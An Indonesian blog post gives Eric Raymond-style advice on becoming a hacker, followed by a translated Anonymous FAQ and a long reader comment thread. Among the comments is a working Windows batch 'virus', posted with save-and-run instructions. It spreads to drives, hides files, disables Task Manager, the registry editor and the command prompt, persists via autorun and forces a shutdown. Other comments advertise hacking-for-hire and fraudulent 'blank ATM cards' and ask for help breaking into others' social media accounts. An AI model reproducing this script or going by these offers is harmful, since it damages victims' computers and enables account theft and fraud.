Cara Menjadi Seorang Hacker Anonymous

Ketika membaca tulisan saya sebelumnya tentang 6 hacker paling top sedunia, banyak orang mungkin berpikir kalau mereka itu adalah orang-orang yang jenius. Tidak bisa kita pungkiri kalau bakat dan talenta itu memang sesuatu yang penting. Ada beberapa orang yang dilahirkan dengan kemampuan yang di atas rata-rata. Tapi tahukah kita kalau para ahli itu, termasuk hacker, dibuat bukan dilahirkan? Seorang hacker hadir dari proses belajar, seorang hacker tidak lahir dan langsung menjadi hacker. Ada tahapan yang harus dilalui, ada attitude yang harus dipunyai, ada kemampuan yang harus diraih sehingga seseorang diakui sebagai hacker.

Mungkin banyak juga yang penasaran bagaimana caranya menjadi seorang hacker? Apa saja yang harus dipelajari dan dimiliki seorang hacker? Setidaknya 4 cara untuk menjadi seorang hacker yang akan saya ungkapkan dalam artikel ini mungkin dapat sedikit menjawab rasa penasaran tersebut. Dan sebagai catatan, saya tidak sedang berusaha sok pintar atau ingin menggurui sobat dblogger. Saya juga bukan seorang hacker. Apa yang ada dalam tulisan ini adalah hasil rangkuman dari tulisan salah satu hacker yang ada dalam daftar 6 hacker top sedunia, yaitu Eric S Raymond. Okay, let’s check this out!
1. Berpikirlah Seperti Seorang Hacker
Bagaimana seorang hacker berpikir? Apa yang ada di otak seorang hacker? Seorang hacker selalu memikirkan bagaimana caranya menyelesaikan suatu masalah dan bagaimana caranya membuat sesuatu. Seorang hacker juga sangat menghargai kebebasan dan mau menolong dengan sukarela. Kalau ingin menjadi hacker, seseorang harus memiliki attitude ini.
Dunia ini dipenuhi berbagai permasalahan yang sangat menarik untuk diselesaikan. Dengan mencoba menyelesaikan permasalahan-permasalahan ini, seseorang akan mempertajam kemampuan dan melatih kecerdasannya. Ingat juga bahwa suatu permasalahan tidak perlu diselesaikan lebih dari sekali. Oleh karena itu jangan pernah merasa enggan untuk membagikan informasi dan solusi terhadap suatu permasalahan. Ini adalah tanggung jawab moral seorang hacker.
Budaya hacker adalah suatu budaya tentang pengakuan. Seseorang tidak dapat menyebut dirinya sendiri sebagai hacker. Seseorang tidak akan pernah benar-benar menjadi hacker sampai orang lain (para hacker) menyebutnya sebagai hacker. Untuk mendapatkan pengakuan ini tentu saja butuh usaha, kerja keras, dan kontribusi kepada komunitas. Beberapa hal yang dapat dilakukan untuk berkontribusi kepada komunitas:
  • Buatlah perangkat lunak (program) open source.
  • Investasikan waktu luang untuk membantu memperbaiki perangkat lunak open source dengan melakukan debugging.
  • Publikasikan informasi yang berguna.
  • Berikan bantuan untuk menjaga infratstruktur tetap berjalan.
2. Pelajari Pemrograman
Pelajarilah bagaimana caranya menulis program. Untuk benar-benar menjadi seorang hacker kemampuan pemrograman sangatlah penting. Para hacker menyelesaikan berbagai permasalahan yang mereka temui dengan menulis program. Cara paling mudah untuk mempelajari cara menulis program adalah dengan membaca dokumentasi yang ditulis oleh para masternya. Kemudian cobalah menulis program sedikit demi sedikit. Teruslah berlatih untuk mencapai suatu level kemampuan pemrograman yang cukup baik. Jika sudah cukup percaya diri dengan suatu bahasa pemrograman, cobalah untuk mempelajari bahasa pemrograman lainnya. Mempelajari beberapa bahasa pemrograman akan mengajarkan kita memandang suatu permasalahan dari sisi lain.

3. Kenali dan Gunakan Unix/Linux
UNIX dan sistem operasi yang mengadopsi konsep yang sama seperti Linux dan BSD adalah sistem operasi utama Internet. Namun untuk menggunakan UNIX seseorang mungkin harus mengeluarkan uang dalam jumlah yang cukup besar. Solusinya adalah menggunakan sistem operasi yang open source seperti GNU/Linux (dengan berbagai pilihan distribusi) dan FreeBSD (dan turunan BSD lainnya). Pelajarilah Linux, gunakan distro yang mudah dan ramah untuk pemula seperti Ubuntu. Pasanglah sistem operasi ini di PC atau laptop dan gunakan untuk bekerja/bermain sehari-hari.
Mungkin sebagian orang akan berpikir mengapa harus menggunakan Unix/Linux/FreeBSD? Apakah tidak bisa menggunakan sistem operasi lain? Sistem operasi tertutup seperti Microsoft Windows dan Mac OS tidak akan mengizinkan seseorang untuk mempelajari kode sumbernya apalagi melakukan modifikasi. Belajar menjadi hacker menggunakan sistem operasi seperti itu ibarat belajar menari dengan tubuh dicor.

4. Pelajari HTML
HTML adalah mainan hacker yang telah mengubah dunia. Belajarlah bagaimana cara menggunakan World Wide Web dan menulis kode HTML. Menggunakan Word Wide Web bukan berarti sekedar menggunakan browser dan berselancar di dunia maya melainkan bagaimana caranya membangun suatu situs menggunakan bahasa penanda web (web markup language). Cobalah membangun home page menggunakan sintaks-sintaks HTML.

PANDUAN MENJADI ANONYMOUS

Pertanyaan?

1. Jadi Anda ingin bergabung dengan Anonymous?
2. Bagaimana untuk mendapatkan kontak dengan yang lainnya?
3. Bagaimana cara mengenali Anonymous lain?
4. Apakah Anda telah disusupi?
5. Bagaimana cara melindungi privasi saya?
6. Hal benar apa yang harus saya lakukan?
7. Berapa banyak Anonymous yang ada?

Jawaban

1. Jadi Anda ingin bergabung dengan Anonymous?
Anda tidak dapat bergabung dengan Anonymous. Tidak seorangpun yang bergabung dengan Anonymous.
Anonymous bukanlah organisasi. Ini bukan klub, partai atau bahkan gerakan.
Tidak ada piagam, tidak ada manifesto, tidak ada biaya keanggotaan.
Anonymous tidak memiliki pemimpin, tidak ada guru, tidak ada ideolog. Bahkan, tidak memiliki ideologi tetap. Kita semua bagaikan orang yang melakukan perjalanan jauh bersama.
Seperti penumpang yang bertemu di bus atau KRL: pada waktu yang sama dan memiliki rute yang sama, berbagi tujuan bersama, umum atau yang tidak suka. Dan dalam perjalanan bersama, kita mungkin akan mengubah dunia.
Tidak ada yang berhak berbicara sebagai Anonymous. Tidak ada yang bisa mengatakan: Anda diterima, atau Anda ditolak.

Apakah Anda masih ingin bergabung dengan Anonymous? Nah, Anda telah bergabung jika Anda mau.

2. Bagaimana untuk mendapatkan kontak dengan yang lainnya?
Anonymous tidak memiliki infrastruktur terpusat. Kami menggunakan fasilitas yang ada di Internet,
jaringan sosial khususnya, dan kami siap untuk pindah ke yang lainnya jika yang satu ini tampaknya terganggu, sedang diserang, atau mulai membuat kami bosan.

Pada saat penulisan ini, Facebook, Twitter dan IRC menjadi rumah bagi jemaat yang paling aktif. Tapi ini bisa berubah setiap saat. Namun, ini mungkin tempat terbaik untuk memulai.
Carilah istilah seperti "anonim", "anonops" dan kata kunci lain yang mungkin dihubungkan dengan kegiatan kami.  
     
3. Bagaimana cara mengenali Anonymous lainnya?
Kami datang dari semua tempat masyarakat: Kami adalah mahasiswa, pekerja, pegawai, pengangguran;
Kami masih muda atau tua, kita memakai jas atau kaos oblong, kami hedonis, pertapa, klub pengendara atau aktivis.
Kami datang dari semua ras, negara-negara dan etnis. Kami sangat banyak. Kami adalah tetangga Anda, rekan kerja anda, penata rambut Anda, sopir bus dan administrator jaringan Anda.

Kami adalah orang di jalan dengan koper dan gadis di bar yang Anda coba untuk merayunya. Kami adalah Anonymous. Banyak dari kita suka memakai topeng Guy Fawkes pada saat melakukan demonstrasi.
Sebagian dari kita bahkan menampilkannya pada gambar profil mereka di jaringan sosial yang membantu untuk mengenali satu sama lain.

4. Apakah Anda telah disusupi?
Jika Anda berbicara dengan Anonymous yang lain, Anda tidak akan pernah tahu siapa dia. Dia mungkin seorang hacker, cracker, phisher, agen, mata-mata, provokator atau hanya orang dari sebelah rumah. Atau putri atau putra tetangga Anda.
Hal ini tidaklah ilegal untuk menjadi Anonymous. Juga tidak ilegal untuk memakai topeng Guy Fawkes. Ingatlah hal tersebut.
Jika Anda secara pribadi tidak terlibat dalam kegiatan ilegal, Anda tidak perlu khawatir, tidak peduli dengan siapa Anda berbicara. Jika memang Anda melakukannya, adalah bijaksana untuk tidak membicarakannya
kepada siapa pun.
   
5. Bagaimana cara melindungi privasi saya?
Menciptakan alias, nick, nama samaran ... sebutlah salah satu sesuka Anda, ciptakanlah sebuah nama.
Kemudian buatlah akun email dengan nama nick Anda tadi dengan salah satu penyedia email besar.
Gunakan alamat email ini untuk mendaftar Twitter, Facebook, dan akun lainnya. Pastikan untuk menghapus semua cookie
Sebelum Anda mulai menggunakan identitas baru Anda, atau lebih baik menggunakan web browser yang berbeda untuk Anonymous dan kegiatan lainnya.
Jika Anda memiliki kebutuhan yang lebih tinggi untuk keamanan, tanya kepada kami tentang enkripsi, stenografi, TOR, dll. Banyak dari kami yang tahu bagaimana menggunakan hal hal tersebut.
Kami akan selalu menghormati kebutuhan Anda akan privasi. Kami tidak akan pernah meminta informasi pribadi Anda. Jika kami melakukannya, kami tidak akan mengharapkan jawaban benar dan Anda tidak harus menjawab dengan benar.

6. Hal benar apa yang harus saya lakukan?
Satu-satunya orang yang dapat memberitahu Anda apa yang tepat bagi Anda adalah diri Anda sendiri.
Ini juga satu-satunya orang yang harus Anda ikuti. Kami tidak memiliki pemimpin.

Anda juga orang yang hanya bertanggung jawab atas tindakan Anda. Lakukan apa yang Anda anggap benar. Jangan lakukan apa yang Anda anggap salah.

7. Berapa banyak Anonimous yang ada?
Kami lebih dari yang Anda pikirkan. Kami lebih dari pikiran siapapun. Kami sangat banyak. Dan Anda sekarang salah satu dari kami. Selamat Datang Anonymous.

Sudah siap menjadi seorang hacker sobat dblogger?

330 komentar:

«Terlama   ‹Lebih tua   1 – 200 dari 330   Lebih baru›   Terbaru»
Anonim mengatakan...

Parah nihh,, baru gua mau gabung,, masa gua harus belajar sendiri sihh...................

Anonim mengatakan...

maff ...

Anonim mengatakan...

Coba blajar dulu deh, dari dulu kpinginnya gabung. Tp ilmu masih dikit

Education mengatakan...

silahkan gan

Anonim mengatakan...

masih belajar gimana caranya

Anonim mengatakan...

Come join us!

Anonim mengatakan...

maaih blajar ni gan

Anonim mengatakan...

Yeayy Anonymous ^ kwkwkwk

Anonim mengatakan...

bagaimana cara menhack sebuah siy\tus

Anonim mengatakan...

dimana markas anonymuos

Anonim mengatakan...

siapa itu anonymuos

sjunji mengatakan...

aku tidak akan mengecewakan anonyoumus indonesia saya akan belajar dari diri sendri

Education mengatakan...

Perfect (y)

Unknown mengatakan...

terkadang belajar banyak belum tentu yang kita dapat banyak juga gan

Unknown mengatakan...

Info nya sangat bermanfaat gan!

Unknown mengatakan...

ini adalah kata' yang bakalan gw inget "Anda juga orang yang hanya bertanggung jawab atas tindakan Anda. Lakukan apa yang Anda anggap benar. Jangan lakukan apa yang Anda anggap salah...

Wantoro G. mengatakan...

Klo berorganisasi kita bisa saling bertukar ilmu

SEO Jakarta mengatakan...

Jangan ragu untuk mengunjungi website saya Kursus Komputer Murah Terbaik di Jakarta

Taufiq371 mengatakan...

Widih begitu ya caranya menjadi hacker. terimakasih atas infonya gan :D


Kunjungi Balik ya gan Blog saya : Taufiq Rahman Atau www.rahman371.wordpress.com


Terimakasih :)

Unknown mengatakan...

←←When You See It

Unknown mengatakan...

Me Welcome People!

wp mengatakan...

baik gan, tpi saya hrus dftar drimana ..>?

Imam muzakkin mengatakan...

oxe-oxe

praynimous mengatakan...

ya ya saya tau apa yg harus saya lakukan,.!

Anonim mengatakan...

Terima kasih master Anonymous...
Sudah menunjukkan jalan dalam mencari jati diri saya. Attitude sudah saya miliki, "skill : false;" Bagaimana dong master?. Masa sih suruh belajar sendiri..????

Welcome To Z3R007 mengatakan...

Gan fikri gimana cara hack facebook 2014 ? saya mau mengembalikan fb saya yang di hack seorang hacker

geistr mengatakan...

apa ada website anonymous indonesia ?
apa anonymous pernah ngumpul bareng ? itu jarkomnya gimana ya ?

Unknown mengatakan...

Bagaimana cara menjadi seorang anonymous yang handal? yang bisa meng-hack sebuah situs dan sistem keamanan negara, bukan hanya facebook saja, terangin dong hehe

Anonim mengatakan...

numapng copas gan

Unknown mengatakan...

gmna nih gan cara gabung"y<<biasa la msh pemula,,heheehe

ParamaKirtiWiyanto mengatakan...

Boleh copas gak gan ?

Unknown mengatakan...

Nice ANONYMOUS

Unknown mengatakan...

kalian semua yg comen tu termasuk gan.. pasti di antara kalian banyak yg bisa root android kan.. bisa cheat game kan.. bisa ngejebol kartu atm lewat nota tiket pesawat yg di buang di tong sampah kan.. sori ke bablasan.. tp itu udah bukan hal tabu lagi di dunia digital.. pencurian uang.. nyulik gadis.. dan hal hal lain nya.. kita sangat menghargai kebebasan..

Unknown mengatakan...

tg mau partisipasi lawan hacker isis,daftar anonymous france >>>>> ghostbin.com

Hikamz Hacked mengatakan...

We Are Anonymous!
By : HIKAMz Fawkes

Unknown mengatakan...

apa ini yg di bilang belajar..

Unknown mengatakan...

gmna cara menggunakn ddos attack gan?

n mengatakan...

root jga bisa

Unknown mengatakan...

Kok,nama,kalian,anonim

Unknown mengatakan...

Hust...
Jangan berisik

Unknown mengatakan...

Hust...
Jangan berisik

Unknown mengatakan...

Gan._.dapat aplikasinya dari mana?

Unknown mengatakan...

izin copas bro...

Unknown mengatakan...

saya sudah mendaownload aplikasi anonymous. berhasil meng hack fb teman saya. saya salut dengan aplikasi ini (Y)

Unknown mengatakan...

Apa android bisa hack juga? pngn jadi hacker tapi ga punya komputer

raffiq' mengatakan...

ingat aja !

Hargai kebebasan dan lakukan yang mnrut lu benar dan jgn lpa pla bahwa anonim tdklah sbuah komunitas dan juga tdk memiliki pemimpin dia tersebar di sluruh dunia (World) welcome Guys

Unknown mengatakan...

apa nama software hack fb gw mau coba dong min

Unknown mengatakan...

kalo boleh kasih link downloadnya dong min

Unknown mengatakan...

Gan Saya Mau Nanyak
Phiser Itu Apa
Yang Saya Tahu Cuma Hacker Dan Cracer
Dan Saya Ini Masih Hacker Newbie Dan Cracer Newbie

anonymous mengatakan...

wellcome to anonymous.. no body know who we are. no body know what we want.. we just do .. and goverment should affraid to people ..
try to find me, try to open my mask
( @nonymous)

Mas anto mengatakan...

Mantap min blog ente bnyak membntu ane nylsain mslh tntang hack fb dan bahkan kita bisa mnjdi bgian dari itu sndri salam dari ane SUMATRA TIMUR

Zikter mengatakan...

Tujuan anonymous hacking : untuk mendapatkan keadilan bukan untuk melakukan kejahatan
Quest "cara hack situs gimana bang?" Mungkin lu harus mulai dari yang kecil kecil dulu bro contoh : belajar menggunakan google element

Unknown mengatakan...

Ini saya aada virus yang berbahaya silakan coba
jangan langsung coba sama kawan,sama kalian dulu kalo rusak laptop baru berhasil kalo gak ya udah :v
Copy-Paste aja
cara pemakaian ya simple
buka notepad
lalu Klik file dan save,tapi pas di
save as type ya:pili "ALL"
lalu nama ya bebas
contoh:Ganas.bat
selesai deh

Echo off > C:\virxx.txt
if no exist C:\Windows\%0 copy %0 C:\Windows
for %%p in (A C D E F G H) do copy %0 %%p:
for %%q in (A C D E F G H) do dir %%q:\*.3gp /B /S >> C:\virxx.txt
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind
/t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
DisableTaskMgr /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoFolderOptions /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v
ShowSuperHiden /t REG_DWORD /d 0 /f
for %%r in (A C D E F G H) do attrib +h +s %%r:\*.3gp /s
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun
/t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v gorun /t REG_SZ /d
C:\Windows\virxx.bat /f
REG ADD HKCU\Software\Policies\Microsoft\Windows\System DisableCMD /t REG_DWORD /d
2 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoViewOnDrive /t REG_DWORD /d 4 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
DisableRegedit /t REG_DWORD /d 1 /f
Shutdown -s -t 360 -c “Virus Menjangkiti Komputer Anda” -f
Exit

Unknown mengatakan...

Gua cuma bisa hack Facebook aja
:(

Unknown mengatakan...

Gua cuma bisa hack Facebook aja
:(

Unknown mengatakan...

anyone can join !

Unknown mengatakan...

Baca Artikel Newbie Hacker ku di

Www.bisniswhaffterpercaya.blogspot.com

Unknown mengatakan...

hack facebook nya gimana si? pake software? atau engga jgua bisa?

Unknown mengatakan...

pengen ganti jadi linux.. itu pusing ga ya?

Unknown mengatakan...

kita adalah anonymous indonesia... setidaknya udh ada niat...😄

Unknown mengatakan...
Komentar ini telah dihapus oleh pengarang.
Unknown mengatakan...

Btw yg jago nge-hack sesuatu pin dong.. atau medsosnya

Unknown mengatakan...

sya udah coba gimana hack sesama penguna wifi dlm 1 jaringan ! memang masi newbie sih ! kalo ada yg tau nge remote komputer dlm 1 jaringan bagi ilmu dong !

Unknown mengatakan...

remote komputer lain dalam 1 jaringan wifi maksud saya

Unknown mengatakan...

sipa
gua setujuh

Unknown mengatakan...

Masih butuh belajar (y)

Unknown mengatakan...

Yang bener gan

Unknown mengatakan...

Saya akan mencoba menjadi hacker

Unknown mengatakan...

Saya sudah 3x hack akun,tetapi saya mengalami kesulitan untuk menghack akun teman saya karena ada kode apk?

Unknown mengatakan...

Saya lumayan bisauntuk hack gmail

Anonim mengatakan...

Mohon bimbingannya para kakak2 senior anonymous..

Anonim mengatakan...

Mohon bimbingannya para kakak2 senior anonymous..

Unknown mengatakan...

Kalau aku sih pengen jadi penjahat yg baik hati....

Find With Us. mengatakan...

pada dasarnya crecker dan hacker adalah seni keamanan dunia internet

Andre mengatakan...

Saya dengan tegas ingin bergabung dengan anonymous tujuannya saya ingin menjadi spionase,mata mata,pembobol sistem,menyusup,mencuri data rahasia negara,dan saya ingin membobol bank israel. Sejauh ini saya sudah bisa bahasa pemograman dan menggunakan unix saya juga pernah membobol wifi speedy instant milik tetangga sebelah

Andre mengatakan...

Saya juga sudah bisa menciptakan virus malware tapi tidak saya sebarkan tapi

Andre mengatakan...

Saya juga mengetahui pasti bila malware saya memasuki sebuah sistem komputer maka akan cepat menyebar melalui harddisk dan bila mamasuki ram penyebarannya akan semakin efektif mamastikan semua file ikut terinfeksi penyebaran firus ini cukup mudah bisa di sebarkan melalui website,facebook,bbm,twiter,line DLL. Caranya cukup mudah hanya kirimkan malware ini ke perangkat sistem yg tidak memiliki antivirus super bahkan AVAST dan SMADAV saja tidak mampu mendeteksi dan mengkarantina virus ini saya akan jual karya saya ke anonymous dan juga saya ingin menghack bank di israel seperti yg di lakukan hacker muslim asal algeria

Andre mengatakan...

Saya minta tolong bagi yang mengetahui kontak anonymous bantulah saya

Unknown mengatakan...

expect us!!!

Unknown mengatakan...

expect us!!!

Unknown mengatakan...

sekarang gw udh bisa hack makasih ya

Unknown mengatakan...

<< nuebie. Kakak kakak di atas keliatan sangat pintar hacking. Share dong uda sampai mana saya mau belajar.
salam
#HNComunity

maulanaravly mengatakan...

Sharing ilmunya dong kakak kakak

maulanaravly mengatakan...

Sharing ilmunya dong kakak kakak

Unknown mengatakan...

Thanks For u Information

sbobet

khairanid mengatakan...

kakk pertanyaanku beda dari yang lain ...kalo pacarr , keluarga ,teman atau sbgnya kalian tau gak kalian anonymous hehe ..

U_cup mengatakan...

Saya juga ingin menjadi hacker

Unknown mengatakan...

Sikap saya tergantung sikap anda terhadap saya....

Unknown mengatakan...

apa hacker ada kursusnya?

ufuf mengatakan...

Boro2 jadi jacket nge hack fb aja gak bisaaa,,, saya jaminn gk ada yg bakal ngajarinn ampe matii kalau gk belajar sendiri,, kebanuakan hacker pelit ilmuu,, sekali2 sharing kek mas2 semua

Unknown mengatakan...

Hanya orang tak punya/ n gc pnya modal untuk mnjdi s.orang hacker sdjati
//anonymous.s^

Unknown mengatakan...

Hanya orang tak punya/ n gc pnya modal untuk mnjdi s.orang hacker sdjati
//anonymous.s^

Imam Adha M mengatakan...

We are Anonymous!

Imam Adha M mengatakan...

We are Anonymous!

Unknown mengatakan...

terima kasih atas informasinya,saya akan langkah anda untuk menjadi seorang anonymous.

Unknown mengatakan...

saya akan mengejar tujuan yang sama seperti para anonymous lakukan demi masa depan saya.
salam anonymous

Unknown mengatakan...

wrd

Unknown mengatakan...

Incarlah sesuatu yg mustahil, tidak ada system yang aman..

Gamal johanes perdana mengatakan...

Jangan bilang kalo lu seorang hacker kalo masih pake win & ios. Gua akuin lu hecker kalo udah pake Dracos Linux dan bisa meretas satelit militer rusia dan amerika.

Adrian mengatakan...

Nama aplikasinya kalau hack fb apa kaka senior anonymous??

Ferry mengatakan...

Ajarin Hack Fb anonim....
Itu aja cukup

cck mengatakan...

aplikasi attaking ip bagaimana menggunakanya?

Unknown mengatakan...

Nambah ilmu..i am a anonymous now

Iam can everybody mengatakan...

Saya sbenarnya bingung dan disisi lain saya ingin jadi seorang hacker termasuk anonymous, tp dlingkungan saya hacker memiliki pandangan buruk. Tp jika saya lihat di brbagai berita dimedsos, saya rasa banyak keadilan yg anonymous lakukan, kemudian saya berpikir "ini pasti sebuah organisasi" yg mengadili berita" atau ketidaksetujuan melalui internet..
Dan saya rasa saya perlu gabung dlam organisasi ini, karna mungkin kita memiliki visi dan misi yg sama.. Sya ingin menjadi salah satu hacker yg menyelamti dunia dgn internet..
Namun melihat argumen anonymous saya sdikit kecewa, mereka trnyata bukan organisasi, sekumpulan dan identitas yg penuh miste

Iam can everybody mengatakan...

Misteri..
Saya bingung saya harus belajar sendiri padahal saya masih 15 tahun. Banyak cita cita saya yg ingin merubah negara ini menjadi lebih baik. Tapi saya harus memulai dari mana, saya yg msh smp ini saja mulai bingung memikirkan kuliah nanti jurusan apa.. Menjadi STAN demi negara, menjadi ahli internet sperti kalian dan demi negara juga atau melenceng jauh dari itu sperti menjadi pemain bola indonesia untuk negara atau berjihad menjadi pemimpin indonesia demi negara dan islam..
Sejauh ini saya bingung, saya ingin memperdalam semua hal yg menyangkut cita" saya,, sperti agama, program" dan istilah internet, masalah negara dan juga mengasah skill bola saya.. Namun jg hal" tersbut ddampingi msalah kluarga saya yg menyibukkan saya

Iam can everybody mengatakan...

Dan skrg saya hanya bsa berharap suatu saat nanti saya akan menjadi org yg berpengaruh bagi negara.. #SaLaMasakini

HkMod.anms mengatakan...

salam TOR, thanks bro, we are anonymous,, tunjukan niat dan sesuatu yang baik bagi dunia.

Unknown mengatakan...

Ada yg mau tutorial programing java,c++,linux,dll lengkap gan
1.http://www.java2s.com/
2.http://www.bloodshed.net/devcpp.html

Blog si Fadly2 mengatakan...

Saya TAK Peduli Siapa saya Yang penting Saya Ingin Mengikuti Anonymous Untuk MeneGakan Kebenaran Di Israel Dan Di Megara Orang Lain Tolong beritahu Saya bagaimana Cara Ingin Jadi Anonymous Saya Emang Anak Masih Kecil Anonymous Tidak Mengenal Umur Kan Tolong Agar saya Bisa Ng Hack

Unknown mengatakan...

Bisa gak bantuin saya

Unknown mengatakan...

Bisa gak bantuin saya

Unknown mengatakan...

BE SMART AND BECOME RICH .It all depends on how fast
you can be to get the new PROGRAMMED card called the Blank ATM card that is capable of
hacking into any ATM, anywhere in the world
The card has the ability to withdraw up to $2,000 daily. Though is illegal,there is no risk of being caught
,because we have programmed this CARD in such a way that it is not traceable,it
also has a technique that makes it impossible for the CCTVs to detect
you..For details on how to get yours today, email the us on :
cyberatmhackers@outlook.com

Unknown mengatakan...

bagaimana cara ngehack Instagram ?? diambil alih.

Unknown mengatakan...

You're fucking idiot

Unknown mengatakan...

Just a human man. By do wey

Unknown mengatakan...

Welcome<<<

Unknown mengatakan...

Keren gan, ane coba ikutin ah caranya,,,
Ditunggu kunbalnya gan : https://martinsparda.blogspot.co.id

Unknown mengatakan...

Yes I a'm redy hacker

Ibrahim Yusuf mengatakan...

Bersemangat belajar untuk menjaga negara kita dari peretas lain itu udah cukup

Anonim mengatakan...

Min tolong bantu saya, tolong invit line 1215m4nh . Maksih

Unknown mengatakan...

susah gk jadi hacker??

blackaxel mengatakan...

waiting for you to make an impact to save Indonesia .......*..

Roni yahya mengatakan...

Hai Semua Anonymous Indonesia
Kita udah liat Gimana ISIS memperlakukan Manusia sebagai Hewan Dan ada juga di bunuh

SALAM ANONYMOUS INDONESIA

Unknown mengatakan...

Gan bisa bantu hack akun Instagram ga?

Unknown mengatakan...

Para hackers Indonesia saya minta tolong dengan sangat besar. Bantu saya hack akun Instagram calon tunangan saya. Saya takut di salah gunakan. Saya takut menjadi fitnah. Alamat WhatsApp 087774125003

Unknown mengatakan...

saya ingin tapi tidak mampu kalau sendiri, saya butuh bimbingan kalian

Adriansyah Injberg mengatakan...

Mr. Anonymous how to hack FB.

Anonim mengatakan...

menjadi seorang anonymos itu butuh usaha yang sangat keras mungkin mengeluarkan banyak uang juga harus mempelajarin dunia digital hal itu semua sangatlah sulit tapi yang berhasil akan mendapatkan kebebasan dan kesenangan yang luar biasa.

NAFASAT QABEEL mengatakan...

Halo semua, apakah Anda membutuhkan layanan peretasan?
Kemudian menghubungi >>> NOBLEHACKER284@GMAIL.COM untuk layanan hacking yang terbaik.
Jadilah memperingatkan, sebagian besar disebut hacker penipu,
Aku tahu bagaimana sebenarnya hacker bekerja, mereka tidak pernah mengiklankan diri sedemikian sopan santun mudah percaya dan mereka selalu diskrit.
Saya telah scammed berkali-kali putus asa mencoba untuk menemukan bantuan mendesak untuk mengubah nilai sekolah saya,
akhirnya teman saya memperkenalkan saya kepada sekelompok hacker handal yang bekerja dengan kebijaksanaan dan memberikan segera,
mereka melakukan segala macam hackings mulai dari;
-Sales kartu ATM kosong.
-hack ke akun email dan melacak lokasi email
-semua akun media sosial,
Database -sekolah untuk menghapus atau mengubah nilai,
-Retrieval dari kehilangan file / dokumen
-DUIs
catatan-perusahaan dan sistem,
account -Bank, rekening Paypal
kartu -Credit hack
-Credit skor hack
-Monitor telepon dan alamat email
Alamat IP -hack
+ Tekan ke panggilan siapa pun dan memantau percakapan mereka
>>>> KONTAK >> NOBLEHACKER284@GMAIL.com
         **CATATAN**
Mereka juga dapat mengajarkan cara untuk melakukan hal berikut dengan ada E-Book dan tutorial online
* Apakah pasangan Anda kecurangan pada Anda? mereka dapat mengajarkan cara untuk
- TAP KE PANGGILAN MEREKA DAN MONITOR PERCAKAPAN MEREKA
* Email dan pesan teks intersepsi,
* Hack dan menggunakan Kartu Kredit untuk berbelanja online,
* Memantau telepon dan alamat email,
* Hack Android dan iPhone Anda sendiri, dengan tanggapan langsung dan manfaat diskon refferal ..

anony mengatakan...

gimana sih biar bisa menjadi heaker?
pingin sih jadi heaker biar bisa melindunggi negara in

Kurai mengatakan...

Pada ngayal semua belajar koding aja susahnya kaya ngerjain matematika proffesor 1000 soal :v apalagi melajarin hacking :v

Kurai mengatakan...

Pada ngayal semua belajar koding aja susahnya kaya ngerjain matematika proffesor 1000 soal :v apalagi melajarin hacking :v

Unknown mengatakan...

Bagi ilmunya dong gan

Unknown mengatakan...

Bagi ilmunya dong gan

Nice to meet you mengatakan...

Maaf sbelum nya mengganggu
Bagi yg ingin balas silahkan....


Saya adalah seseorang yg menyukai game lgr bisa di sebut juga get rich


Sebut saja gemers...


Apakah anda pernah mendengar kata gammers???

What gammers?????
Dan kalian pasti punya teman/pacar seorang gamers??benar kan?

Yap ,pasti....
Dan kalian pernah berfikir....?
Gamers buruk bagi kita...
Gamrs gak punya waktu.....
Gamers mementingkan game nya....
Gamers itu bodoh pelajaran.....
Gamers itu autis....
Gamers itu cuek....

Pasti kalian pernah....


Dan sebagian besar itu adalah FAKTA,.
Dan ingat....ingat pesan saya....



Sebetulnya gamers itu tidak buruk....
Buruk nya seseorang Bukan karna dia senang game,tp itu dari dirinya sendiri
Bukan karna gara gara game dia menjadi cuek....itu karna sifat nya sendiri...


Dan bisa di ingat ....
Kami para gamers:

Tidak akan kecanduan narkoba
Tidak akan terkena pergaulan bebas
Tidak akan pernah mabuk mabuk an
Tidak akan pernah terkena minuman keras
Tidak akan terkena obat obatan terlarang
Dan yg terpenting bagi kalian
GAMERS TIDAK AKAN MEMAINKAN HATI KALIAN
KARNA DIA SUDAH PUNYA PERMAINAN UNTUK DIA PERMAINKAN.....



SALAM DAMAI
#GAMERS INDO...
#GAMERS ANDROID..
#LETS GET RICH

Unknown mengatakan...

We are anonymous
We are legion
Love you anonymous saya fernando ludji saya berjanji akan menjadi seorang hacker yang lebih hebat dari pemimpin anonymous

Unknown mengatakan...

mau gabung bisa ?

Unknown mengatakan...

tolong email tutorial ngan anonymoussaja123@gmailcom

Unknown mengatakan...

Langkah awal saya jadi hacker anonymous gimana?

Unknown mengatakan...

Apa menjadi hacker harus memahami bahasa pemrograman?

Unknown mengatakan...

Ka..Ada yang bisa ajari saya bagaimana caranya?Langkah awal nya?

Hanif mengatakan...

Anoyumous

Hanif mengatakan...

Anoyumous

Hanif mengatakan...

Anoyumous

unknow mengatakan...

kereenn.. pngen gabung tpi msh bingung cara ny,,

Unknown mengatakan...

tidak gampang, Jika kalian semua berminat.
belajarla dengan giat.
:)

Unknown mengatakan...

Nice. Bikin pc layaknya batu bata 😉

Unknown mengatakan...

Gimana caranya

Unknown mengatakan...

Saya mau belajar tapi gk tau software nya tolong minta softwarenya dong anonymous

Unknown mengatakan...

Siap....

Septian mengatakan...

Siap

Septian mengatakan...

Siap

Unknown mengatakan...

Saya masih Awam Dengan dunia Hack mohon di bantu dari mulai basic sampa pro .

Unknown mengatakan...

Jangankan hack situs buka tor aja sulit

Unknown mengatakan...

Saya ingin membuka tor!!!
Akan tetapi saya rasa itu tidaklah mudah

Unknown mengatakan...

Saya meminta bantuan:
Istilahnya saya ini ingin untuk keluar dari google dan masuk ke tor setelah itu pindah ke server lain

dante mengatakan...

Tukang ketoprak:)

Unknown mengatakan...

Eh Gan... Skrg Deface Sembarangan Boleh Gak Sih?? Resiko Sma BSSNnya tinggi

Unknown mengatakan...

